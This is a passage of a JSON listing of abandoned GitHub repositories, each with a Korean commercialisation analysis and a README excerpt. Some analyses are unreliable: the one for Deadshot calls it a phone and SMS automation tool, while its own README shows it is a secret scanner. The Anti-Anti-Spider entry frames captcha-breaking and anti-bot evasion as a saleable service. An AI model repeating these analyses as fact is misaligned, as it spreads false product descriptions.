friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg)](http://commitizen.github.io/cz-cli/) ![Continuous Integration Testing](https://github.com/jmcdo29/testing-nestjs/workflows/Continuous%20Integration%20Testing/badge.svg) [![Coffee](https://badgen.net/badge/Buy%20Me/A%20Coffee/purple?icon=kofi)](https://www.buymeacoffee.com/jmcdo29)\n\n  <p align=\"center\">\n    <a href=\"http://nestjs.com/\" target=\"blank\"><img src=\"https://nestjs.com/img/logo-small.svg\" width=\"200\" alt=\"Nest Logo\" /></a>\n  </p>\n</div>\n\n# testing-nestjs\n\nA repository to show off to the community methods of testing NestJS including Unit Tests, Integration Tests, E2E Tests, pipes, filters, interceptors, GraphQL, Mongo, TypeORM, and more!\n\n## Project Structure\n\nEach folder is a fully functional Nest application on its own. All you need to do after cloning the repository is move into the folder, install the dependencies, and test! Or you could just, you know, look at t","composite_score":0.3898,"license_safety_tag":"safe"},{"name":"mdbootstrap/perfect-scrollbar","github_url":"https://github.com/mdbootstrap/perfect-scrollbar","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":19,"description":"# Perfect Scrollbar 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 스크롤 바를 더 예쁘고 부드럽게 만들어주는 솔루션으로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 대시보드나 프로젝트 관리 도구에서 스크롤 환경을 개선하여 프리미엄 버전 제공\n2. **내부 업무 도구**: 기","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://perfectscrollbar.com/?utm_source=GitHub&utm_medium=PerfectScrollbar\">\n    <img src=\"https://perfectscrollbar.com/logo2.png\" width=\"300\" height=\"200\">\n  </a>\n</p>\n\n<h1 align=\"center\">perfect-scrollbar</h1>\n\n<p align=\"center\">Minimalistic but perfect custom scrollbar plugin<p>\n\n\n<p align=\"center\">\t\n  <a href=\"https://npmcharts.com/compare/perfect-scrollbar?minimal=true\"><img src=\"https://img.shields.io/npm/dm/perfect-scrollbar.svg\" alt=\"Downloads\"></a>\n  <a href=\"https://github.com/mdbootstrap/bootstrap-material-design/blob/master/License.pdf\"><img src=\"https://img.shields.io/badge/license-MIT-green.svg\" alt=\"License\"></a>\t\n  <a href=\"https://badge.fury.io/js/perfect-scrollbar\"><img src=\"https://badge.fury.io/js/perfect-scrollbar.svg\" alt=\"npm\"></a>\t\n<a href=\"https://twitter.com/intent/tweet/?text=Thanks+@mdbootstrap+for+maintaining+amazing+and+free+Perfect+Scrollbar+Plugin%20https://perfectscrollbar.com/&hashtags=javascript,code,webdesign,bootstrap\"","composite_score":0.3898,"license_safety_tag":"safe"},{"name":"umano/AndroidSlidingUpPanel","github_url":"https://github.com/umano/AndroidSlidingUpPanel","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":47,"description":"# AndroidSlidingUpPanel 분석\n\n## 왜 보물인가\n모바일 앱에서 화면 아래에서 위로 슬라이드되는 패널 UI를 쉽게 만들 수 있는 도구로, 현대적인 모바일 앱 사용자 경험을 빠르게 구현하게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **지도 기반 앱 서비스**: 우버, 배달앱처럼 지도 위에 정보 패널이 필요한 SaaS 서비스\n2. **음악/","readme_excerpt":"[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.sothree.slidinguppanel/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.sothree.slidinguppanel/library)\n[![Badge](http://www.libtastic.com/static/osbadges/30.png)](http://www.libtastic.com/technology/30/)\n\n**Note:** we are **not** actively responding to issues right now. If you find a bug, please submit a PR. \n\nAndroid Sliding Up Panel\n=========================\n\nThis library provides a simple way to add a draggable sliding up panel (popularized by Google Music and Google Maps) to your Android application.\n\nAs seen in Umano Android App (now acquired by Dropbox):\n\n![SlidingUpPanelLayout](https://raw.github.com/umano/AndroidSlidingUpPanelDemo/master/slidinguppanel.png)\n\n### Known Uses in Popular Apps\n\n* [Soundcloud] (https://play.google.com/store/apps/details?id=com.soundcloud.android)\n* [Dropbox Paper] (https://play.google.com/store/apps/details?id=com.dropbox.paper)\n* [Snaptee] (https://play.g","composite_score":0.3895,"license_safety_tag":"safe"},{"name":"HospitalRun/hospitalrun-frontend","github_url":"https://github.com/HospitalRun/hospitalrun-frontend","stars":10,"language":"TypeScript","license":"mit","abandonment_months":41,"description":"# HospitalRun Frontend 분석\n\n## 왜 보물인가\n병원의 환자 관리와 진료 기록을 무료로 관리할 수 있는 오픈소스 시스템으로, 의료비 부담이 큰 개발도상국과 소규모 의료기관에 큰 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 클라우드 기반 병원 관리 플랫폼으로 제공하여 월 구독료 징수\n**2. 내부 업무 도구*","readme_excerpt":"# HospitalRun Frontend\n\n<div align=\"center\">\n\n![Status](https://img.shields.io/badge/Status-developing-brightgree) [![Release](https://img.shields.io/github/release/HospitalRun/hospitalrun-frontend.svg)](https://github.com/HospitalRun/hospitalrun-frontend/releases) [![Version](https://img.shields.io/github/package-json/v/hospitalrun/hospitalrun-frontend)](https://github.com/HospitalRun/hospitalrun-frontend/releases)\n[![GitHub CI](https://github.com/HospitalRun/frontend/workflows/GitHub%20CI/badge.svg)](https://github.com/HospitalRun/frontend/actions) [![Coverage Status](https://coveralls.io/repos/github/HospitalRun/hospitalrun-frontend/badge.svg?branch=master)](https://coveralls.io/github/HospitalRun/hospitalrun-frontend?branch=master) [![Language grade: JavaScript](https://img.shields.io/lgtm/grade/javascript/g/HospitalRun/hospitalrun-frontend.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/HospitalRun/hospitalrun-frontend/context:javascript) ![Code scanning](https://github.c","composite_score":0.3893,"license_safety_tag":"safe"},{"name":"twilio-labs/deadshot","github_url":"https://github.com/twilio-labs/deadshot","stars":42,"language":"Python","license":"MIT","abandonment_months":19,"description":"# Deadshot 저장소 분석\n\n## 왜 보물인가\nTwilio(통신 API 대기업)의 공식 랩에서 만든 프로젝트로, 전화·문자 기반 자동화 작업을 간편하게 처리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 긴급 알림·예약 문자 자동 발송 기능을 가진 고객 관리 플랫폼\n2. **내부 업무 도구**: 콜센터나 배송업체의 대","readme_excerpt":"# Deadshot\nDeadshot is a Pull Request scanner that looks for the introduction of secrets via PRs by matching each diff line against a set of known secret expressions.\n\n## Application capabilities:\nService is responsible for:\n- Real-time Pull Request diff processor to check for secrets being committed to Github via new code\n- Notify the user on the PR conversation if it flags something\n- Slack notify the security team channel when certain secrets are identified in code for which you've enabled slack notifications via a flag in regex.json\n\nService does NOT:\n- Do any static or dynamic code analysis\n\n## How does it work?\nDeadshot is a Flask-Celery-Redis multi-container application that is installed as a Github app to run on every Pull Request created against the main branch of a repo on which the Github app is installed.\n\nThe Flask container is the entry point for the service by exposing API routes defined in blueprints.py. Once a Pull request payload is received on the API route the servi","composite_score":0.389,"license_safety_tag":"safe"},{"name":"Te7a-Houdini/laravel-trix","github_url":"https://github.com/Te7a-Houdini/laravel-trix","stars":11,"language":"PHP","license":"MIT","abandonment_months":15,"description":"# laravel-trix 가치 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 글을 쓸 때 필요한 '글쓰기 도구'를 라라벨(웹개발 도구)과 연결해주는 작은 다리 역할을 하는 코드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/CMS 플랫폼**: Medium처럼 멋진 글쓰기 환경을 제공하는 웹사이트 구축\n2. **기업 뉴스레터 도구**: 회사 직원들이 쉽","readme_excerpt":"<p align=\"center\"><img height=\"400px\" src=\"logo.svg\"></p>\n\n<p align=\"center\">\n<a href=\"https://github.com/Te7a-Houdini/laravel-trix/releases\"><img src=\"https://img.shields.io/github/release/Te7a-Houdini/laravel-trix.svg?style=flat-square\" alt=\"Releases\"></a>\n<a href=\"https://travis-ci.org/Te7a-Houdini/laravel-trix\"><img src=\"https://img.shields.io/travis/Te7a-Houdini/laravel-trix/master.svg?style=flat-square\" alt=\"Build Status\"></a>\n<a href=\"https://github.styleci.io/repos/217703400\"><img src=\"https://github.styleci.io/repos/217703400/shield\" alt=\"StyleCI\"></a>\n<a href=\"https://scrutinizer-ci.com/g/Te7a-Houdini/laravel-trix/?branch=master\"><img src=\"https://img.shields.io/scrutinizer/g/Te7a-Houdini/laravel-trix.svg?style=flat-square\" alt=\"Code Quality\"></a>\n<a href=\"https://github.com/Te7a-Houdini/laravel-trix/blob/master/LICENSE.md\"><img src=\"https://img.shields.io/github/license/Te7a-Houdini/laravel-trix.svg?style=flat-square\" alt=\"License\"></a>\n<a href=\"https://packagist.org/package","composite_score":0.3888,"license_safety_tag":"safe"},{"name":"scrollreveal/scrollreveal","github_url":"https://github.com/scrollreveal/scrollreveal","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"","readme_excerpt":"<p align=\"center\">\n\t<a href=\"https://scrollrevealjs.org\" title=\"Visit ScrollReveal home page\">\n\t\t<img src=\"https://scrollrevealjs.org/img/logomark.svg\" alt=\"ScrollReveal\" width=\"120\">\n\t</a>\n</p>\n<br>\n<p align=\"center\">\n\t<a href=\"https://scrollrevealjs.org\" title=\"Visit ScrollReveal home page\">\n\t\t<img width=\"200\" src=\"https://scrollrevealjs.org/img/scrollreveal-logotype-dark.svg\" alt=\"ScrollReveal\">\n\t</a>\n</p>\n<p align=\"center\">Animate elements as they scroll into view.</p>\n\n<p align=\"center\">\n\t<a href=\"https://travis-ci.org/jlmakes/scrollreveal\">\n\t\t<img src=\"https://img.shields.io/travis/jlmakes/scrollreveal.svg\" alt=\"Build status\">\n\t</a>\n\t<a href=\"https://www.npmjs.com/package/scrollreveal\">\n\t\t<img src=\"https://img.shields.io/npm/dm/scrollreveal.svg\" alt=\"Monthly downloads\">\n\t</a>\n\t<a href=\"https://www.npmjs.com/package/scrollreveal\">\n\t\t<img src=\"https://img.shields.io/npm/v/scrollreveal.svg\" alt=\"Version\">\n\t</a>\n\t<img src=\"https://img.shields.io/badge/min+gzip-5.7_kB-blue.svg\" alt=\"5","composite_score":0.3887,"license_safety_tag":"unknown"},{"name":"github/hub","github_url":"https://github.com/github/hub","stars":5,"language":"Go","license":"mit","abandonment_months":28,"description":"# github/hub 분석 보고서\n\n## 왜 보물인가\nGitHub 작업을 명령어로 빠르게 처리할 수 있는 도구로, 개발자들이 반복적인 작업에 소비하는 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 도구 SaaS**: GitHub 작업 자동화 기능을 웹 대시보드로 제공하는 구독 서비스\n2. **기업 내부 개발 플랫폼**:","readme_excerpt":"hub is a command line tool that wraps `git` in order to extend it with extra\nfeatures and commands that make working with GitHub easier.\n\nFor an official, potentially more user-friendly command-line interface to GitHub,\nsee [cli.github.com](https://cli.github.com) and\n[this comparison](https://github.com/cli/cli/blob/trunk/docs/gh-vs-hub.md).\n\nThis repository and its issue tracker is **not for reporting problems with\nGitHub.com** web interface. If you have a problem with GitHub itself, please\n[contact Support](https://github.com/contact).\n\nUsage\n-----\n\n``` sh\n$ hub clone rtomayko/tilt\n#=> git clone https://github.com/rtomayko/tilt.git\n\n# or, if you prefer the SSH protocol:\n$ git config --global hub.protocol ssh\n$ hub clone rtomayko/tilt\n#=> git clone git@github.com:rtomayko/tilt.git\n```\n\nSee [usage examples](https://hub.github.com/#developer) or the [full reference\ndocumentation](https://hub.github.com/hub.1.html) to see all available commands\nand flags.\n\nhub can also be used to make s","composite_score":0.3887,"license_safety_tag":"safe"},{"name":"jeromeetienne/AR.js","github_url":"https://github.com/jeromeetienne/AR.js","stars":5,"language":"HTML","license":"mit","abandonment_months":42,"description":"# AR.js 상용화 분석\n\n## 왜 보물인가\n스마트폰 카메라로 현실 위에 가상의 3D 물체를 띄우는 증강현실 기술을 누구나 쉽게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 가구/패션 전자상거래 SaaS**\n온라인 쇼핑객이 구매 전에 자신의 집이나 몸에 가구와 옷이 어떻게 어울리는지 미리 확인할 수 있는 서비스로, 반품률을 크게","readme_excerpt":"# AR.js - Augmented Reality for the Web\n\n<img src=\"https://github.com/jeromeetienne/AR.js/blob/master/AR.js-1920-1080-HD.png?raw=true\" height=\"200\" />\n\nLogo by [Simon Poulter](https://twitter.com/viralinfo)\n\n---\n\n[![npm](https://img.shields.io/npm/v/ar.js.svg)](https://www.npmjs.com/package/ar.js)\n[![npm](https://img.shields.io/npm/dt/ar.js.svg)](https://www.npmjs.com/package/ar.js)\n[![Build Status](https://travis-ci.org/jeromeetienne/AR.js.svg?branch=master)](https://travis-ci.org/jeromeetienne/AR.js)\n<br class=\"badge-separator\" />\n[![Gitter chat](https://badges.gitter.im/AR-js/Lobby.png)](https://gitter.im/AR-js/Lobby)\n<span class=\"badge-patreon\"><a href=\"https://patreon.com/jerome_etienne\" title=\"Donate to this project using Patreon\"><img src=\"https://img.shields.io/badge/patreon-donate-yellow.svg\" alt=\"Patreon donate button\" /></a></span>\n[![Twitter Follow](https://img.shields.io/twitter/follow/nicolocarp.svg?style=plastic&label=nicolocarpignoli-twitter&style=plastic)](https://twit","composite_score":0.3886,"license_safety_tag":"safe"},{"name":"marcuswestin/WebViewJavascriptBridge","github_url":"https://github.com/marcuswestin/WebViewJavascriptBridge","stars":5,"language":"Objective-C","license":"mit","abandonment_months":22,"description":"# WebViewJavascriptBridge 분석\n\n## 왜 보물인가\n스마트폰 앱 내에서 웹페이지와 앱의 기능을 자유롭게 연결해주는 핵심 도구로, 모바일 앱 개발자들의 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **하이브리드 모바일 앱 개발 플랫폼(SaaS)**: 개발자가 웹 기술으로 iOS/Android 앱을 빠르게 만들 수 있도록 지원하는 ","readme_excerpt":"WebViewJavascriptBridge\n=======================\n\n[![Circle CI](https://img.shields.io/circleci/project/github/marcuswestin/WebViewJavascriptBridge.svg)](https://circleci.com/gh/marcuswestin/WebViewJavascriptBridge)\n\nAn iOS/OSX bridge for sending messages between Obj-C and JavaScript in WKWebViews, UIWebViews & WebViews.\n\nMigration Guide\n---------------\n\nWhen upgrading from v5.0.x to 6.0.x you will have to update the `setupWebViewJavascriptBridge` javascript snippet. See https://github.com/marcuswestin/WebViewJavascriptBridge#usage part 4).\n\nWho uses WebViewJavascriptBridge?\n---------------------------------\nWebViewJavascriptBridge is used by a range of companies and projects. This is a small and incomplete sample list:\n\n- [Facebook Messenger](https://www.facebook.com/mobile/messenger)\n- [Facebook Paper](https://facebook.com/paper)\n- [Yardsale](http://www.getyardsale.com/)\n- [EverTrue](http://www.evertrue.com/)\n- [Game Insight](http://www.game-insight.com/)\n- [Sush.io](http://www.sush.i","composite_score":0.3881,"license_safety_tag":"safe"},{"name":"dragen1860/TensorFlow-2.x-Tutorials","github_url":"https://github.com/dragen1860/TensorFlow-2.x-Tutorials","stars":11,"language":"Jupyter Notebook","license":"unknown","abandonment_months":69,"description":"# TensorFlow-2.x-Tutorials 분석\n\n## 왜 보물인가\n구글이 만든 인공지능 학습 프레임워크의 최신 버전을 단계별로 배우고 실습할 수 있는 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유데미, 코세라 같은 사이트에서 \"TensorFlow 2.x 완벽 가이드\" 강의판매\n2. **기업 직무교육 도구**:","readme_excerpt":"# TensorFlow 2.0 Tutorials \nOur repo. is the **Winner** of [⚡#PoweredByTF 2.0 Challenge!](https://devpost.com/software/tensorflow-2-0-tutorials).\n\n\n<p align=\"center\">\n  <img src=\"res/tensorflow-2.0.gif\" width=\"250\" align=\"middle\">\n</p>\n\nTimeline:\n- Oct. 1, 2019: TensorFlow 2.0 Stable!\n- Aug. 24, 2019: [TensorFlow 2.0 rc0](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf)\n- Jun. 8, 2019: [TensorFlow 2.0 Beta](https://twitter.com/fchollet/status/1134583289384120320)\n- Mar. 7, 2019: [Tensorflow 2.0 Alpha](https://www.tensorflow.org/alpha)\n- Jan. 11, 2019: [TensorFlow r2.0 preview](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf)\n- Aug. 14, 2018: [TensorFlow 2.0 is coming](https://groups.google.com/a/tensorflow.org/forum/#!topic/discuss/bgug1G6a89A)\n\n\n\n# Installation\n\nmake sure you are using python 3.x.\n\n- CPU install\n```python\npip install tensorflow -U\n```\n\n- GPU install\n\nInstall `CUDA 10.0`(or after) and `cudnn` by yourself. and set `LD_LIBRARY_PATH` up.\n\n```python","composite_score":0.3881,"license_safety_tag":"unknown"},{"name":"Himenon/code-dependency","github_url":"https://github.com/Himenon/code-dependency","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":15,"description":"","readme_excerpt":"# @code-dependency\n\n## Install\n\n```bash\nyarn global add @code-dependency/cli\n```\n\n## Usage\n\n```bash\ncode-dependency --source ./src\n# open localhost:3000\n```\n\nsee [other option](./packages/cli/README.md#option).\n\n![code dependency usage image](./docs/code-dependency-image.png)\n\n## Core development UI / APi\n\n- **sverweij/dependency-cruiser** https://github.com/sverweij/dependency-cruiser\n\n## Development\n\nRun webpack-dev-server for @code-dependency/view\n\n```bash\ncd packages/view\nyarn start\n```\n\nRun api server for @code-dependency/cli\n\n```bash\nyarn start\n```\n\n## License\n\ncode-dependency is [MIT licensed](https://github.com/Himenon/code-dependency/blob/master/LICENSE).\n","composite_score":0.3878,"license_safety_tag":"safe"},{"name":"facebookincubator/create-react-app","github_url":"https://github.com/facebookincubator/create-react-app","stars":58,"language":"JavaScript","license":"mit","abandonment_months":15,"description":"# Create React App 사업화 분석\n\n## 왜 보물인가\n누구나 쉽게 웹 애플리케이션을 만들 수 있도록 자동으로 복잡한 설정을 해주는 도구라서, 개발자의 진입장벽을 크게 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 이 기술 위에 '코딩 없이 웹앱을 만드는 노코드 플랫폼'을 구축해 판매\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"## Create React App [![Build & Test](https://github.com/facebook/create-react-app/actions/workflows/build-and-test.yml/badge.svg?branch=main)](https://github.com/facebook/create-react-app/actions/workflows/build-and-test.yml) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-green.svg)](https://github.com/facebook/create-react-app/blob/main/CONTRIBUTING.md)\n\n> [!CAUTION]\n>\n> ## Deprecated\n>\n> Create React App was one of the key tools for getting a React project up-and-running in 2017-2021, it is now in long-term stasis and we recommend that you migrate to one of React frameworks documented on [Start a New React Project](https://react.dev/learn/start-a-new-react-project).\n>\n> If you are following a tutorial to learn React, there is still value in continuing your tutorial, but we do not recommend starting production apps based on Create React App.\n\n<img alt=\"Logo\" align=\"right\" src=\"https://create-react-app.dev/img/logo.svg\" width=\"20%\" />\n\nCreate React apps with no build configur","composite_score":0.3878,"license_safety_tag":"safe"},{"name":"zodiacon/EtwExplorer","github_url":"https://github.com/zodiacon/EtwExplorer","stars":5,"language":"C#","license":"MIT","abandonment_months":19,"description":"# EtwExplorer 상용화 분석\n\n## 왜 보물인가\n컴퓨터 내부에서 일어나는 모든 활동을 투명하게 볼 수 있는 도구로, 보안 문제 진단과 성능 최적화에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 모니터링 SaaS**: 회사 직원들의 컴퓨터에서 보안 위협이나 악성 프로그램 활동을 실시간으로 감지하는 클라우드 서비스\n2. **내부","readme_excerpt":"# EtwExplorer\nView ETW Provider metadata\n\nEvent Tracing for Windows ([ETW](https://docs.microsoft.com/en-us/windows/win32/etw/event-metadata-overview)) is a logging facility built into the Windows OS. Modern providers register a manifest that describes all the events they support, with their properties. Classic providers register a MOF instead.\n\nETW Explorer attempts to show these events with a simple GUI.\n\n![ETWExplorer](./etwexplorer2.PNG)\n","composite_score":0.3876,"license_safety_tag":"safe"},{"name":"nlpodyssey/spago","github_url":"https://github.com/nlpodyssey/spago","stars":13,"language":"Go","license":"BSD-2-Clause","abandonment_months":14,"description":"# Spago 저장소 분석\n\n## 왜 보물인가\n사람과 자연스럽게 대화하는 인공지능을 만드는 핵심 기술로, 개인이나 작은 회사도 고급 AI 서비스를 직접 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 AI 회사들이 챗봇이나 질문 답변 서비스를 자체 개발해 고객에게 판매\n- **내부 업무 도구**: 기업이 자체 문서나 ","readme_excerpt":"<p align=\"center\">\n    <br>\n    <img src=\"https://github.com/nlpodyssey/spago/blob/main/assets/spago_logo.png\" width=\"400\"/>\n    <br>\n<p>\n<p align=\"center\">\n    <a href=\"https://github.com/nlpodyssey/spago/actions/workflows/go.yml?query=branch%3Amain\">\n        <img alt=\"Build\" src=\"https://github.com/nlpodyssey/spago/actions/workflows/go.yml/badge.svg?branch=main\">\n    </a>\n    <a href=\"https://codecov.io/gh/nlpodyssey/spago\">\n        <img alt=\"Coverage\" src=\"https://codecov.io/gh/nlpodyssey/spago/branch/main/badge.svg\">\n    </a>\n    <a href=\"https://goreportcard.com/report/github.com/nlpodyssey/spago\">\n        <img alt=\"Go Report Card\" src=\"https://goreportcard.com/badge/github.com/nlpodyssey/spago\">\n    </a>\n    <a href=\"https://codeclimate.com/github/nlpodyssey/spago/maintainability\">\n        <img alt=\"Maintainability\" src=\"https://api.codeclimate.com/v1/badges/be7350d3eb1a6a8aa503/maintainability\">\n    </a>\n    <a href=\"https://pkg.go.dev/github.com/nlpodyssey/spago/\">\n        <img","composite_score":0.3875,"license_safety_tag":"safe"},{"name":"android-cn/android-open-project-analysis","github_url":"https://github.com/android-cn/android-open-project-analysis","stars":5,"language":"","license":"apache-2.0","abandonment_months":80,"description":"# android-open-project-analysis 평가\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 다양한 오픈소스 프로젝트들을 한곳에 분석하고 정리한 학습 자료로, 개발자들이 검증된 코드를 빠르게 찾아 활용할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 개발팀을 위한 \"안드로이드 코드 라이브러리 추천 플랫폼","readme_excerpt":"Android 开源项目源码解析\n====================================\n这是一个协作项目，最终多数开源库原理解析会在这里分享出来。  \n欢迎大家`Star`、`Fork`，让更多的人知道并加入进来！  \n\n**稳定版地址：**[android-cn/android-open-project-analysis](https://a.codekk.com)。  \n**开发版地址：**[aosp-exchange-group/android-open-project-analysis](https://github.com/aosp-exchange-group/android-open-project-analysis)，请参与者基于这个库提交。  \n\n**在线网站：[www.codekk.com](https://a.codekk.com)**  \n\n### 1. 如何加入\n以`你想分析的开源库库名`作为验证信息，申请加入 QQ 群（485334692）即可  \n\n### 2. 具体编写步骤\n具体步骤请见：[编写步骤](./zen/procedure.md)  \n\n### 3. 开源项目源码分析\n目前参与者 [Author](author.md)  \n\n#### 3.2 第二期成果\n\n分析文档 | 作者 \n:------------- | :------------- \n[android-Ultra-Pull-To-Refresh 源码解析](https://a.codekk.com/detail/Android/Grumoon/android-Ultra-Pull-To-Refresh%20%E6%BA%90%E7%A0%81%E8%A7%A3%E6%9E%90) | [grumoon](https://github.com/grumoon)\n[DynamicLoadApk 源码解析](https://a.codekk.com/detail/Android/FFish/DynamicLoadApk%20%E6%BA%90%E7%A0%81%E8%A7%A3%E6%9E%90) | [FFish](https://github.com/FFish)\n[NineOldAnimations 源码解析](https://a.codekk.","composite_score":0.3872,"license_safety_tag":"safe"},{"name":"fluentpython/example-code","github_url":"https://github.com/fluentpython/example-code","stars":7,"language":"Python","license":"mit","abandonment_months":55,"description":"# Fluent Python 예제 코드 저장소 분석\n\n## 왜 보물인가\n파이썬이라는 인기 있는 프로그래밍 언어를 더 잘 사용하기 위한 실전 예제들을 모아둔 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 파이썬 초급자를 위한 유료 강의 콘텐츠로 제공하거나 기존 강의에 예제 코드 번들로 판매\n2. **기업 내부 교육 도구**: ","readme_excerpt":"Fluent Python, First Edition: example code\n==========================================\n\n**This repository is archived and will not be updated. Please visit https://github.com/fluentpython/example-code-2e**\n\nExample code for the book `Fluent Python, First Edition` by Luciano Ramalho (O'Reilly, 2015).\n\n* Code here may change and disappear without warning. \n\n* If a piece of code is not yet in the ebook, it's likely to be broken.\n\n* A major reorganization may happen when the last chapter is done. \n\n* No promises. No guarantees. Use at own risk.\n\n.. _Fluent Python: http://shop.oreilly.com/product/0636920032519.do \n","composite_score":0.3865,"license_safety_tag":"safe"},{"name":"ethereum/cpp-ethereum","github_url":"https://github.com/ethereum/cpp-ethereum","stars":7,"language":"C++","license":"gpl-3.0","abandonment_months":27,"description":"# ethereum/cpp-ethereum 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심인 이더리움을 C++ 언어로 구현한 프로젝트로, 고속 처리가 필요한 금융 시스템에 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소**: 대량의 거래를 빠르게 처리하는 백엔드 시스템으로 활용\n2. **블록체인 노드 판매 서비스**: 기업용 이","readme_excerpt":"# Aleth – Ethereum C++ client, tools and libraries\n\n> The collection of C++ libraries and tools for Ethereum,\n> formerly known as _cpp-ethereum_ project.\n> This includes the full Ethereum client **aleth**.\n\n## ⚠️ **This project has been discontinued and is no longer maintained.** \n\n## Contact\n\n[![Gitter](https://img.shields.io/gitter/room/ethereum/aleth.svg)](https://gitter.im/ethereum/aleth)\n[![GitHub Issues](https://img.shields.io/github/issues-raw/ethereum/aleth.svg)](https://github.com/ethereum/aleth/issues)\n\n- Chat in [aleth channel on Gitter](https://gitter.im/ethereum/aleth).\n- Report bugs, issues or feature requests using [GitHub issues](https://github.com/ethereum/aleth/issues/new).\n\n\n## Usage\n\nThe Ethereum Documentation site hosts the **[aleth homepage](http://cpp-ethereum.org)**, which\nhas a Quick Start section.\n\n\nOperating system | Status\n---------------- | ----------\nUbuntu and macOS | [![TravisCI](https://img.shields.io/travis/ethereum/aleth/develop.svg)](https://travis-c","composite_score":0.3862,"license_safety_tag":"restricted"},{"name":"luyishisi/Anti-Anti-Spider","github_url":"https://github.com/luyishisi/Anti-Anti-Spider","stars":7,"language":"Python","license":"unknown","abandonment_months":56,"description":"# Anti-Anti-Spider 저장소 분석\n\n## 왜 보물인가\n웹사이트가 자동 접근을 막으려는 기술을 우회하는 방법을 제공하여, 정당한 데이터 수집 작업을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **시장 조사 SaaS**: 경쟁사 가격 정보나 상품 데이터를 자동으로 수집하여 고객에게 제공하는 서비스\n2. **뉴스 모니터링 도구**: 여러","readme_excerpt":"## 基于CNN的验证码图片识别\n### 简介\n\t本项目采用alexnet模型和letnet模型，可根据实际需要选择(在train_model.py中的train函数修改即可)95.5%\n### 作者有话说\n\t不知不觉这个git库伴随我从16到到20年，带给我自己最棒的一段人生旅程，\n\t整理了这份文档，希望任何想学习图片识别，玩玩卷积神经网络的同学可以最便捷的上手体验。\n\t请谨慎使用技术，仅支持学习，不支持任何黑灰产相关\n\t可参看：https://www.urlteam.cn/?p=1893 https://www.urlteam.cn/?p=1406\n\t原先的Anti-Anti-Spider 全部内容移动到 原Anti-Anti-Spider 目录下\n\t有何疑问可邮件 543429245@qq.com 咨询\n\t模型文件下载 如果出现无法解压，可以使用：\n\thttps://www.urlteam.cn/%E5%8F%AF%E7%94%A8%E8%AE%AD%E7%BB%83%E9%9B%86%E4%B8%8E%E8%AE%AD%E5%A5%BD%E7%9A%84%E6%A8%A1%E5%9E%8B.zip\n\n#### Alexnet 模型结构\n\n![](src/READMEIMG2.PNG)\n\n根据验证码的复杂度不同，训练的时间也会有较大的不同\n![](src/READMEIMG1.PNG)\n\n###  使用方法\n\t1.开始训练样本前，修改conf/config.json\n\t2.将预处理过的数据集分成验证集和训练集，放到sample目录下\n\t3.运行train_model.py开始训练，训练完成的模型保存至model_result中\n\t4.将训练好的模型放置model_result，运行cnn_models/recognition.py，选定验证码，即可看到模型效果\n### 环境配置\nTensorFlow CPU版本安装：`pip install tensorflow==1.9.0`\nTensorFlow GPU版本安装：`pip install tensorflow-gpu==1.9.0`\nGUP版本的安装比较麻烦，需要安装CUDA和cuDNN才能使tensorflow调动GPU\n下图为TensorFlow，Python，CUDA与cuDNN之间的版本对应关系：\n","composite_score":0.3856,"license_safety_tag":"unknown"},{"name":"naman14/Timber","github_url":"https://github.com/naman14/Timber","stars":6,"language":"Java","license":"unknown","abandonment_months":37,"description":"# Timber 저장소 분석\n\n## 왜 보물인가\n음악 재생, 다운로드, 관리를 한 곳에서 처리할 수 있는 개인용 음악 플레이어 애플리케이션입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 SaaS**: 로컬 음악 파일 관리 기능을 강화한 개인 음악 서비스로 유료화\n2. **팟캐스트/오디오북 플랫폼**: 음악 플레이어 기능을 확장하여 유료 콘텐츠 제","readme_excerpt":"# Timber\n[![Build Status](https://travis-ci.org/naman14/Timber.svg?branch=master)](https://travis-ci.org/naman14/Timber)\n\nMaterial Design Music Player\n\nThis project is no longer in active development. Please refer to [TimberX](https://github.com/naman14/TimberX) instead\n\n<a href='https://play.google.com/store/apps/details?id=naman14.timber&pcampaignid=MKT-Other-global-all-co-prtnr-py-PartBadge-Mar2515-1'><img alt='Get it on Google Play' src='https://play.google.com/intl/en_us/badges/images/generic/en_badge_web_generic.png' height=90px/></a>\n\n<a href='https://f-droid.org/repository/browse/?fdid=naman14.timber'><img alt='Get it on F-Droid' src='https://guardianproject.info/wp-content/uploads/2014/07/logo-fdroid.png' height=60px/></a>\n\n## Screenshots\n\n<img 